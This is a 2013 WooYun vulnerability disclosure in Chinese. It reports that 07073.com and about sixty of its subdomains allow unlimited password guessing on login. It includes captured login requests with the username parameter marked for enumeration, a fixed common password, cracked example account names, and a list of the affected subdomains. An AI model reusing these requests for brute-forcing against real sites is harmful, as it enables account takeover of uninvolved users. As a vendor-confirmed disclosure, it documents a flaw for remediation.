当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-036061

漏洞标题:07073主站及多个分站设计不当可破解他人账号密码

相关厂商:07073.com

漏洞作者: niliu

提交时间:2013-09-04 10:37

修复时间:2013-10-19 10:37

公开时间:2013-10-19 10:37

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-04: 细节已通知厂商并且等待厂商处理中
2013-09-04: 厂商已经确认,细节仅向厂商公开
2013-09-14: 细节向核心白帽子及相关领域专家公开
2013-09-24: 细节向普通白帽子公开
2013-10-04: 细节向实习白帽子公开
2013-10-19: 细节向公众公开

简要描述:

07073主站及60多个分站设计不当可任意登陆他人账号

详细说明:

主站及所有分站均存在此问题,
登陆是无验证码也无登陆错误次数限制,
导致可爆破他人密码。
以用户admin密码123456,

1.jpg


登陆时抓包如下

GET /service/jsonLogin/§admin§/123456/1/r407 HTTP/1.1
Host: me.07073.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.3.6000 Chrome/22.0.1229.79 Safari/537.1
Accept: */*
DNT: 1
Referer: http://www.07073.com/login
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3


直接对用户名admin进行批量猜解

2.jpg


liu:123456
登陆截图

liu.jpg


liu2.jpg


某分站:

http://ui1.07073.com/center/login/


以用户test密码111111登陆

3.jpg


登录时抓包如下

POST /center/login/ HTTP/1.1
Host: ui1.07073.com
Proxy-Connection: keep-alive
Content-Length: 100
Origin: http://ui1.07073.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Maxthon/4.0.3.6000 Chrome/22.0.1229.79 Safari/537.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
DNT: 1
Referer: http://ui1.07073.com/center/login/
Accept-Encoding: gzip,deflate
Accept-Language: zh-CN
Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
Cookie: ###¥#@%@¥%#¥%#¥%;
act=doLogin&userAccount=§test§&userPassword=111111&loginState=1&validateEmailFlag=0&validateEmailCode=


还是以密码不变,对用户名参数userAccount进行批量破解

4.jpg


jiang:111111登陆截图

jiang.jpg


而且账号在各个分站都是通用的,什么游戏,论坛,贴吧什么的挺多的。

漏洞证明:

问题涉及全部分站六七十个吧

http://123.07073.com/
http://kf.07073.com/
http://37wan.07073.com/
http://acg.07073.com/
http://ad.07073.com/
http://anime.07073.com/
http://tu.07073.com/
http://tieba.07073.com/
http://db.07073.com/
http://kf.07073.com/
http://company.07073.com/
http://chanye.07073.com/
http://dh.07073.com/
http://kf.07073.com/
http://fahao.07073.com/
http://flash.07073.com/
http://ge.07073.com/
http://hd.07073.com/
http://huodong.07073.com/
http://huoying.07073.com/
http://kc.07073.com/
http://list.07073.com/
http://me.07073.com/center/login/
http://mh.07073.com/
http://www.07073.com/mhdl/
http://mo.07073.com
http://myoo.07073.com
http://news.07073.com
http://news.wap.07073.com
http://pc.07073.com
http://people.07073.com
http://pinglun.07073.com
http://qq.07073.com
http://rpg.07073.com
http://sb.07073.com
http://search.bbs.07073.com
http://sj.07073.com
http://t.07073.com
http://team.07073.com
http://tieba.07073.com
http://top.07073.com
http://tu.07073.com
http://tv.07073.com
http://txt.07073.com
http://ui.07073.com
http://v.07073.com
http://wap.07073.com
http://wcby.07073.com
http://wenwen.07073.com
http://winter.07073.com
http://wow.07073.com
http://wujie.07073.com
http://www.07073.com
http://xcb.07073.com
http://xiazai.07073.com
http://xin.07073.com
http://xj4.07073.com
http://xxrz.07073.com

修复方案:

登陆时同一加上验证码吧!
求个小礼物~ :D

版权声明:转载请注明来源 niliu@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2013-09-04 10:46

厂商回复:

感谢,我们正努力解决该漏洞

最新状态:

暂无